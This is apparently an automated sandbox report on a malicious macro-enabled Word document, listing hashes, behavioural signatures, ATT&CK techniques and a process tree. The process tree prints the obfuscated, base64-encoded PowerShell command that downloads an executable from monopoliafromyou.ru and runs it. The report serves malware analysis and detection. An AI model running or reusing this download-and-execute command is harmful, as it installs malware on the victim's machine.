173d644887fe55f54403e56181f9f4a61283332b264b2664bdd05f90317b9519

General

Target

173d644887fe55f54403e56181f9f4a61283332b264b2664bdd05f90317b9519.docm
Size

519KB
MD5

f81b30a64f41a0f7a310ca679a228d79
SHA1

356cb6b79fc52f1b3fa931865603e8154459a0ee
SHA256

173d644887fe55f54403e56181f9f4a61283332b264b2664bdd05f90317b9519
SHA512

4a520ffbaca8e870bc32bbf19f3c3f93cf76ed5f6b913c69ce6eb9bf229df4f8709ccbe265a0e19822ba09d431e89e0c6d8d4be601b767f321e2c3012ea1c7ce
SSDEEP

6144:ELEc+F+HLHNIvPl8qZDC9VT8L38S8WyI6OLxoq5seCsH8BB3y8dqtUO2TsyUrYA:ELEcJHNopZW9eLH8WyITLfyXXvqxjb

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://monopoliafromyou.ru/download/2.exe

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	436	2748	cmd.exe	WINWORD.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

24 5012 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

123.exe

pid process

2096 123.exe

flow	pid	process
24	5012	powershell.exe

pid	process
2096	123.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2748 WINWORD.EXE
2748 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1620 powershell.exe
1620 powershell.exe
5012 powershell.exe
5012 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1620 powershell.exe
Token: SeDebugPrivilege 5012 powershell.exe

pid	process
1620	powershell.exe
1620	powershell.exe
5012	powershell.exe
5012	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

WINWORD.EXE

pid	process
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE
2748	WINWORD.EXE

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

WINWORD.EXEcmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2748 wrote to memory of 436	2748	WINWORD.EXE	cmd.exe
PID 2748 wrote to memory of 436	2748	WINWORD.EXE	cmd.exe
PID 436 wrote to memory of 1620	436	cmd.exe	powershell.exe
PID 436 wrote to memory of 1620	436	cmd.exe	powershell.exe
PID 1620 wrote to memory of 5012	1620	powershell.exe	powershell.exe
PID 1620 wrote to memory of 5012	1620	powershell.exe	powershell.exe
PID 5012 wrote to memory of 2096	5012	powershell.exe	123.exe
PID 5012 wrote to memory of 2096	5012	powershell.exe	123.exe
PID 5012 wrote to memory of 2096	5012	powershell.exe	123.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\173d644887fe55f54403e56181f9f4a61283332b264b2664bdd05f90317b9519.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\SYSTEM32\cmd.exe
cmd /c Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkVSA9ICdodHRwOi8vbW9ub3BvbGlhZnJvbXlvdS5ydS9kb3dubG9hZC8yLmV4ZSc7ICRQID0gJ0M6XFByb2dyYW1EYXRhXDEyMy5leGUnOyAkVy5Eb3dubG9hZEZpbGUoJFUsICRQKTsgSW52b2tlLUV4cHJlc3Npb24gJFA7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkVSA9ICdodHRwOi8vbW9ub3BvbGlhZnJvbXlvdS5ydS9kb3dubG9hZC8yLmV4ZSc7ICRQID0gJ0M6XFByb2dyYW1EYXRhXDEyMy5leGUnOyAkVy5Eb3dubG9hZEZpbGUoJFUsICRQKTsgSW52b2tlLUV4cHJlc3Npb24gJFA7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAVQAgAD0AIAAnAGgAdAB0AHAAOgAvAC8AbQBvAG4AbwBwAG8AbABpAGEAZgByAG8AbQB5AG8AdQAuAHIAdQAvAGQAbwB3AG4AbABvAGEAZAAvADIALgBlAHgAZQAnADsAIAAkAFAAIAA9ACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAAxADIAMwAuAGUAeABlACcAOwAgACQAVwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABVACwAIAAkAFAAKQA7ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABQADsA
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5012

C:\ProgramData\123.exe
"C:\ProgramData\123.exe"
5⤵
- Executes dropped EXE
PID:2096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\123.exe

Filesize
1.4MB

MD5
f43852a976edcab5a7c82d248ce242d2

SHA1
446ac2bb76e472c185f56b2b1246910a4438246d

SHA256
4a38db0744930e1f5bfc0a82f63c907f7dc94270b930a3950e6a0abbc903c47f

SHA512
3b4ab06664cb4c228ef0e85cc38d4035d4d2c0b4febd7fa410da65bbcc7b4eafbec924e8d14f02432125fa3d9fb22e50a87707b1c1028ad5d3f0bfbcd4b4075e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD8B82.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_njynlyec.xkh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1620-33-0x00000128B2E40000-0x00000128B2E62000-memory.dmp

Filesize
136KB

Download
memory/2748-13-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-6-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-2-0x00007FFA6D310000-0x00007FFA6D320000-memory.dmp

Filesize
64KB

Download
memory/2748-14-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-12-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-15-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-16-0x00007FFA6AC90000-0x00007FFA6ACA0000-memory.dmp

Filesize
64KB

Download
memory/2748-11-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-10-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-17-0x00007FFA6AC90000-0x00007FFA6ACA0000-memory.dmp

Filesize
64KB

Download
memory/2748-8-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-7-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-30-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-31-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-32-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-9-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-5-0x00007FFAAD32D000-0x00007FFAAD32E000-memory.dmp

Filesize
4KB

Download
memory/2748-0-0x00007FFA6D310000-0x00007FFA6D320000-memory.dmp

Filesize
64KB

Download
memory/2748-4-0x00007FFA6D310000-0x00007FFA6D320000-memory.dmp

Filesize
64KB

Download
memory/2748-1-0x00007FFA6D310000-0x00007FFA6D320000-memory.dmp

Filesize
64KB

Download
memory/2748-3-0x00007FFA6D310000-0x00007FFA6D320000-memory.dmp

Filesize
64KB

Download
memory/2748-548-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-549-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-550-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download
memory/2748-571-0x00007FFA6D310000-0x00007FFA6D320000-memory.dmp

Filesize
64KB

Download
memory/2748-574-0x00007FFA6D310000-0x00007FFA6D320000-memory.dmp

Filesize
64KB

Download
memory/2748-573-0x00007FFA6D310000-0x00007FFA6D320000-memory.dmp

Filesize
64KB

Download
memory/2748-572-0x00007FFA6D310000-0x00007FFA6D320000-memory.dmp

Filesize
64KB

Download
memory/2748-575-0x00007FFAAD290000-0x00007FFAAD485000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads